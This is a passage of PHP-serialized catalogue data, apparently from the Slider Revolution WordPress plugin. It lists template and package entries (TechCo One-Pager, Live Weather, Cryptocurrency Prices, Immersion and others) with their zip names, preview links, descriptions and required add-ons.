00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:169;a:22:{s:2:\"id\";s:3:\"172\";s:5:\"title\";s:15:\"Parallax Scroll\";s:5:\"alias\";s:14:\"parallaxscroll\";s:3:\"zip\";s:18:\"parallaxscroll.zip\";s:3:\"uid\";s:32:\"82546ee2f6af6c6682852f495109b3c3\";s:3:\"img\";s:25:\"parallaxscroll/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/parallax-scroll/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:148:\"<span class=\"ttm_content\">A strikingly colourful header for your website with super smooth parallax effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:170;a:25:{s:2:\"id\";s:3:\"173\";s:5:\"title\";s:24:\"TechCo One-Pager Package\";s:5:\"alias\";s:24:\"techco-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:24:\"techco-one-pager-package\";s:3:\"img\";s:28:\"packages/techco_overview.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:4:\"hero\";i:2;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:171;a:25:{s:2:\"id\";s:3:\"174\";s:5:\"title\";s:11:\"TechCo Menu\";s:5:\"alias\";s:11:\"techco-menu\";s:3:\"zip\";s:21:\"packs/techco-menu.zip\";s:3:\"uid\";s:32:\"55e5efee828cdf1ff7e2d3b90a301ea9\";s:3:\"img\";s:22:\"techco-menu/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:172;a:25:{s:2:\"id\";s:3:\"175\";s:5:\"title\";s:13:\"TechCo Header\";s:5:\"alias\";s:13:\"techco-header\";s:3:\"zip\";s:23:\"packs/techco-header.zip\";s:3:\"uid\";s:32:\"fb574d1376de9b1e408c91f51e6497d7\";s:3:\"img\";s:24:\"techco-header/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:173;a:25:{s:2:\"id\";s:3:\"176\";s:5:\"title\";s:12:\"TechCo About\";s:5:\"alias\";s:12:\"techco-about\";s:3:\"zip\";s:22:\"packs/techco-about.zip\";s:3:\"uid\";s:32:\"ba216da8231e55118d87e37d2358812c\";s:3:\"img\";s:23:\"techco-about/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:174;a:25:{s:2:\"id\";s:3:\"177\";s:5:\"title\";s:15:\"TechCo Services\";s:5:\"alias\";s:15:\"techco-services\";s:3:\"zip\";s:25:\"packs/techco-services.zip\";s:3:\"uid\";s:32:\"ef4a8ddbb5e1136133f7bc1227248e22\";s:3:\"img\";s:26:\"techco-services/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:175;a:25:{s:2:\"id\";s:3:\"178\";s:5:\"title\";s:12:\"TechCo Video\";s:5:\"alias\";s:12:\"techco-video\";s:3:\"zip\";s:22:\"packs/techco-video.zip\";s:3:\"uid\";s:32:\"d7bb92281d05f39f9bc9eca71f90e402\";s:3:\"img\";s:23:\"techco-video/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:176;a:25:{s:2:\"id\";s:3:\"179\";s:5:\"title\";s:13:\"TechCo Prices\";s:5:\"alias\";s:13:\"techco-prices\";s:3:\"zip\";s:23:\"packs/techco-prices.zip\";s:3:\"uid\";s:32:\"6291f404efbea12bb181352aba71ef11\";s:3:\"img\";s:24:\"techco-prices/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:177;a:25:{s:2:\"id\";s:3:\"180\";s:5:\"title\";s:19:\"TechCo Testimonials\";s:5:\"alias\";s:19:\"techco-testimonials\";s:3:\"zip\";s:29:\"packs/techco-testimonials.zip\";s:3:\"uid\";s:32:\"3460bd51f6b80599266fecb7fbb918be\";s:3:\"img\";s:30:\"techco-testimonials/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:178;a:25:{s:2:\"id\";s:3:\"181\";s:5:\"title\";s:13:\"TechCo Footer\";s:5:\"alias\";s:13:\"techco-footer\";s:3:\"zip\";s:23:\"packs/techco-footer.zip\";s:3:\"uid\";s:32:\"640abcd549137520461a4a71ff758a3b\";s:3:\"img\";s:24:\"techco-footer/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:179;a:22:{s:2:\"id\";s:3:\"182\";s:5:\"title\";s:12:\"Live Weather\";s:5:\"alias\";s:7:\"weather\";s:3:\"zip\";s:11:\"weather.zip\";s:3:\"uid\";s:32:\"aab92e69374e4c7b8c6741fe02e574b9\";s:3:\"img\";s:18:\"weather/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/wordpress-live-weather-add-on/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:7:\"5.4.5.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:173:\"<span class=\"ttm_content\">Showcasing our weather add-on, this slider show a different cities temperatures and forecast on each slide.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:168:\"[{\"path\":\"revslider-weather-addon\\/revslider-weather-addon.php\",\"name\":\"Live Weather Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:180;a:22:{s:2:\"id\";s:3:\"183\";s:5:\"title\";s:17:\"360 Panorama Tour\";s:5:\"alias\";s:11:\"360panorama\";s:3:\"zip\";s:15:\"360panorama.zip\";s:3:\"uid\";s:32:\"332720fdacdbb38f65e8327a2a96c52d\";s:3:\"img\";s:22:\"360panorama/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/360-degree-real-estate-virtual-tour/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.5.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">An example template for our Panorama 360 tour add-on, created for the real estate market.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:165:\"[{\"path\":\"revslider-panorama-addon\\/revslider-panorama-addon.php\",\"name\":\"Panorama AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:181;a:22:{s:2:\"id\";s:3:\"184\";s:5:\"title\";s:14:\"Duotone Add-on\";s:5:\"alias\";s:14:\"duotone-add-on\";s:3:\"zip\";s:18:\"duotone-add-on.zip\";s:3:\"uid\";s:32:\"a428c6f363b3146e96d20a6f44958922\";s:3:\"img\";s:25:\"duotone-add-on/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/wordpress-duotone-effect-add-on/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:168:\"<span class=\"ttm_content\">This example template showcases 3 of the 30 Duotone filters available in our brand new Duotone Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:350:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-duotonefilters-addon\\/revslider-duotonefilters-addon.php\",\"name\":\"Duotone AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:182;a:22:{s:2:\"id\";s:3:\"185\";s:5:\"title\";s:13:\"Reveal Add-on\";s:5:\"alias\";s:13:\"reveal-add-on\";s:3:\"zip\";s:17:\"reveal-add-on.zip\";s:3:\"uid\";s:32:\"7fa7525d8ff7fa7365cb98a437e88e32\";s:3:\"img\";s:24:\"reveal-add-on/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/wordpress-content-reveal-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:204:\"<span class=\"ttm_content\">An example template that uses our Reveal Add-On, which adds 14 new preloaders combined with reveal loading effects for any slider or hero.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:337:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:201;a:23:{s:2:\"id\";s:3:\"210\";s:5:\"title\";s:21:\"Cryptocurrency Prices\";s:5:\"alias\";s:12:\"cryptoslider\";s:3:\"zip\";s:16:\"cryptoslider.zip\";s:3:\"uid\";s:32:\"c4b02210387f11946223977e940d9e9e\";s:3:\"img\";s:23:\"cryptoslider/slide1.jpg\";s:7:\"preview\";s:95:\"https://revolution.themepunch.com/cryptocurrency-wordpress-price-api-bitcoin-ethereum-litecoin/\";s:7:\"version\";s:5:\"1.0.6\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:209:\"<span class=\"ttm_content\">This Template can show live, animated cryptocurrency prices. More than 1300 currencies are supported, getting prices via the cryptocompare API.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:410:\"<span class=\"ttm_content\">Please refer to the \"Custom JavaScript\" section of this sliders settings, for info on how to modify currencies. Provide a class to the row / column / group where the currency text elements are located in.</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:202;a:25:{s:2:\"id\";s:3:\"211\";s:5:\"title\";s:18:\"Immersion One Page\";s:5:\"alias\";s:26:\"immersion-one-page-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"immersion-one-page-package\";s:3:\"img\";s:31:\"packages/immersion_overview.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:4:\"hero\";i:2;s:7:\"website\";}s:14:\"plugin_require\";s:343:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"},{\"path\":\"revslider-slicey-addon\\/revslider-slicey-addon.php\",\"name\":\"Background Slicey Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"10\";s:9:\"installed\";b:0;}i:203;a:25:{s:2:\"id\";s:3:\"212\";s:5:\"title\";s:16:\"Immersion Header\";s:5:\"alias\";s:16:\"immersion_header\";s:3:\"zip\";s:26:\"packs/immersion_header.zip\";s:3:\"uid\";s:32:\"853da51256308b341ecd030bd4883229\";s:3:\"img\";s:27:\"immersion_header/slide1.jpg\";s:7:\"preview\";s:74:\"https://revolution.themepunch.com/immersion-wordpress-one-page-theme-2018/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:292:\"<span class=\"ttm_content\">The Immersion WordPress one page theme is a great fit if you quickly want to setup a visually oriented one page website. Using the power of Slider Revolution, we added some interesting effects like slicing and smooth parallax.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:18:\"Immersion One 